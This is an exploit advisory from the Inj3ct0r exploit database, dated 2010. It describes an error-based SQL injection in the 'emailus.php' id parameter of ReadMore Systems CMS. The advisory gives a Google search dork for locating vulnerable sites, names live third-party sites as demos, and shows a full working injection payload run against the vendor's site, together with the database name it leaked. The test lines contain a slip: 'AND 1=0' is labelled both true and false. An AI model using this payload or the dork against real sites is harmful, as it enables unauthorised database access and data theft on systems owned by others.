=============================================================
ReadMore Systems CMS <= Remote (emailus.php) Based SQL Injection
=============================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm KnocKout member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[~] HomePage : http://h4x0resec.blogspot.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : ReadMore Systems CMS
|~Price : N/A
|~Version : N/A
|~Software: http://readmoresystems.com/
|~Vulnerability Style : SQL Injection
|~Vulnerability Dir : /
|~sqL : MySQL error based
|~Google Keyword : "[ website powered by ReadMore Systems, Incorporated ]"
|-Good:)
|[~]Date : "04.11.2010"
|[~]Tested on : (L):Vista (R):Apache/2.2.11 PHP/5.2.9 and Demos.
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Demos: 
http://readmoresystems.com/
http://www.themountainviewonline.com/
http://www.mesquitelocalnews.com/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ===============================================================
    |{~~~~~~~~ Explotation| MySQL error based SQL Injection~~~~~~~~~~~}|
    
    http://$Site/$path/emailus.php?id=1 {SQL Injection}
    http://$Site/$path/emailus.php?id=1+AND 1=0 {True}
    http://$Site/$path/emailus.php?id=1+AND 1=0 {False}
    
    Ex; http://readmoresystems.com/
    
    [~] SQL Injecting
    http://readmoresystems.com/emailus.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
    [~] MSSQL Error : Duplicate entry '~'readmore_cmsupdate'~1' for key 1
    [+] DB Name : readmore_cmsupdate' [OK]
    
    To your Continue..
    
    http://inj3ct0r.com/exploits/14509
    
     .. 
    =============================================================